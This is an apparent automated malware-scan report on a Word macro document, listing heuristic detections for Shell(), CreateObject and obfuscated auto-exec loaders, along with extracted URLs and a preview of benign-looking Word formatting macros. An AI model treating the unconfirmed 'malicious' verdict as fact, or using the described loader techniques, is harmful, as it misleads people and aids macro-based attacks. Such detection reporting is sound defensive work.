MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is an OOXML document containing multiple VBA macros, including auto-executing ones like AutoOpen and Document_Open. Critical heuristics indicate the use of Shell() and CreateObject calls, along with obfuscated code, strongly suggesting the execution of malicious code. The presence of these elements points to a macro-based attack designed to download and execute a secondary payload, a common tactic for initial compromise.
Heuristics 10
-
VBA project inside OOXML medium 8 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.allapi.net/ In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2662308 bytes |
SHA-256: cbc65b8879ee1632967909cf0784d8ef6856ffa73c4590581eac9dcaf27c372a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ChkPage"
Attribute VB_Base = "0{DA289408-08F0-4E1F-AFBE-FEBA38DC9DAD}{6706B64B-CF8C-437F-849D-B6FF3E0BC081}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
'Application.Run MacroName:="مراجعةأرقام_صفحات_الفهارس"
Ch = 1
ChkPage.HIDE
End Sub
Private Sub CommandButton2_Click()
Ch = 2
ChkPage.HIDE
'Application.Run MacroName:="مراجعةأرقام_صفحات_الفهارس2"
End Sub
Private Sub CommandButton4_Click()
End
End Sub
Attribute VB_Name = "copy"
Attribute VB_Base = "0{BF7978E8-492C-4461-981A-9DD48322620A}{9F5534B8-8D8A-485E-B9B8-98808E3FB30D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CheckBox3_Click()
If CheckBox3 = True Then fn2 = 2
If CheckBox3 = False Then fn2 = 0
End Sub
Private Sub CommandButton1_Click()
sors = Selection
Selection.copy
If fn2 = 2 Then
Selection.MoveRight Unit:=wdCharacter, Count:=1
Selection.MoveLeft Unit:=wdCharacter, Count:=1
'Selection.TypeText Text:=" "
'Selection.MoveLeft Unit:=wdCharacter, Count:=1
Selection.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
"PAGE \* Arabic ", PreserveFormatting:=True
Selection.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdExtend
'Selection.MoveLeft Unit:=wdCharacter, Count:=2, Extend:=wdExtend
'Selection.Fields.Unlink
Pg = Selection
Selection.Delete Unit:=wdCharacter, Count:=1
End If
Nc = Nc + 1
mysource2.Activate
Selection.TypeText Text:=sors
Selection.Find.Execute FindText:=sors, Forward:=False, Wrap:=wdFindStop
Selection.MoveRight Unit:=wdCharacter, Count:=1
Selection.TypeText Text:=" " + Pg
'Selection.Paste
Selection.RtlRun
'Selection.TypeText Text:=vbTab + pg
Selection.TypeParagraph
Selection.WholeStory
Selection.copy
Selection.EndKey Unit:=wdStory
mysource1.Activate
End Sub
Private Sub CommandButton2_Click()
mysource2.Activate
Selection.WholeStory
Selection.copy
mysource1.Activate
Selection.Paste
'Selection = ""
'mysource2.Close SaveChanges:=wdDoNotSaveChanges
End Sub
Private Sub CommandButton3_Click()
On Error Resume Next
Selection = ""
mysource2.Close SaveChanges:=wdDoNotSaveChanges
End
End Sub
Private Sub CommandButton4_Click()
mysource2.Close SaveChanges:=wdDoNotSaveChanges
End
End Sub
Attribute VB_Name = "FrmRef1"
Attribute VB_Base = "0{0D4B8977-1804-4631-83CA-5BE6C2465BC6}{C409C76F-3123-4C7A-B95C-C651C58A5063}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Dim FileLoaded As Boolean
Dim OldKey As String
Dim Ref As Collection
Private Sub CommandButton1_Click()
Open "c:\saudmac2007-13\Obt\FrmRef1TrueOrFalse.txt" For Output As #9
Write #9, "FrmRef1"
Write #9, FrmRef1.CheckBox5.Value
Write #9, FrmRef1.CBHash.Value
Write #9, FrmRef1.CheckBox4.Value
Close (9)
End
End Sub
Private Sub CommandButton2_Click()
Dim Sp
If Hash = 1 Then
End If
If FrmRef1.CheckBox5 = False Then Sp = " "
If FrmRef1.CBHash = True Then
Selection.TypeText Text:="<"
End If
If FrmRef1.CheckBox5 = True Then
Selection.TypeText Text:="+["
End If
Selection.Text = ListResult.Text & Sp
Selection.MoveRight Unit:=wdCharacter, Count:=1
If FrmRef1.CheckBox5 = True Then
Selection.TypeText Text:="]"
End If
If FrmRef1.CBHash = True Then
Selection.TypeText Text:=">"
End If
End Sub
Private Sub ListResult_Click()
Me.Caption = ListResult.Text
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 7399424 bytes |
SHA-256: 7956da48d494cde8e35879e07162d5db971363781ce86a4fb39f08fd49e9b51b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.